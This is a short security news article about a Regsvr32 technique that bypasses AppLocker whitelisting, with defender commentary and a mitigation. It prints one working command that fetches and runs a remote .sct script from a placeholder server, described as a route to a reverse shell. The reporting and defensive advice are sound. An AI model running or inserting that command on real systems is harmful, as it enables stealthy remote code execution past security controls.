Recently, a security researcher has discovered a feature in Regsvr32 which allows a hacker to bypass application whitelisting protections, such as those afforded by Microsoft’s AppLocker.
Due to the fact that the process doesn’t alter the system registry and sometimes comes across as normal Internet Explorer traffic, only a little evidence is left for investigators if the above-mentioned technique is used.
The researcher Casey Smith needed to install a reverse shell, though the workstation in question was locked down by AppLocker and script rules. After some trial an error, Smith discovered the curious solution provided bellow:
regsvr32 /s /n /u /i:http://server/file.sct scrobj.dll
“The amazing thing here is that regsvr32 is already proxy aware, uses TLS, follows redirects, etc. … And … You guessed a signed, default MS binary. So, all you need to do is host your .sct file at a location you control,” Smith explained.
Until a while ago, only few people knew that Regsvr32 could accept a URL for a script. This makes for some interesting developments, because all a hacker has to do is place the code block (VP or JS) inside the registration element. Casey Smith published several proof-of-concept scripts that have already been confirmed by other researchers.
In case it is used, the command will make Red Team engagements a bit easier, and the same can be said about criminal attacks. Of course, this is a neat trick. As Smith said, it doesn’t alter the registry, it doesn’t require administrative privileges, and the scripts can be called over HTTP or HTTPS.
“Please note, the exploit described does not make any changes to the registry; monitoring of registry entries will not be effective,” the information security consultant Munin wrote.
Presently, Regsvr32 is whitelisted, seen as an essential system function. The problem is the un-sandboxed feature and network awareness, which is why it can accept URLs, external or local.
“Kind of like early Web browsers, when JavaScript first came out”, Munin explained.
According to Munin, a possible indicator of compromise could exist, as .sct files loaded onto the system might be found in the “Temporary Internet Files” folder.
Despite the fact that there is no patch available, Munin suggests blocking Regsvr32.exe with Windows Firewall, which removes the network awareness. It’s possible that blocks on Regsvr32.exe and Regsvr64.exe will be needed for full effectiveness.
“This is a very severe vulnerability, as it allows for arbitrary code execution by a trusted program, and should be mitigated as soon as possible,” Munin stated.
